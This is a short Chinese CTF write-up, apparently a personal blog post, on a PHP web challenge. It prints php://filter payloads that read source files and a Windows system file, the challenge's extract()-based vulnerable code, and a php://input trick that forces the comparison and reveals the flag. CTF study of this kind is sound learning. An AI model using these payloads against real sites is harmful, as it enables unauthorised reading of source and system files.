滴这道题当时做的时候只做到了看到index.php的源码 当时给了一个博客的提示猜到是swp的那个 但是没有想到是里面的

文件就没有做了,然后在看了wp过后就明白了

访问博客我文章里面的文章里面的practice.txt.swp  或者用php流来读都可以

php流读文件:php://filter/read=convert.base64-encode/resource=index.php  //相对路径

这个路径也可以是绝对路径 php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini  //绝对路径

<?php
include(\'config.php\');
$k = \'hello\';
extract($_GET);
if(isset($uid))
{
    $content=trim(file_get_contents($k));
    if($uid==$content)
    {
        echo $flag;
    }
    else
    {
        echo\'hello\';
    }
}
?>
读到源码
extract这个函数主要就是给变量赋值
然后利用php://input  给post数据为1 就成功了
php伪协议文章
https://www.freebuf.com/column/148886.html

版权声明:本文为haozhizhi原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/haozhizhi/p/10736346.html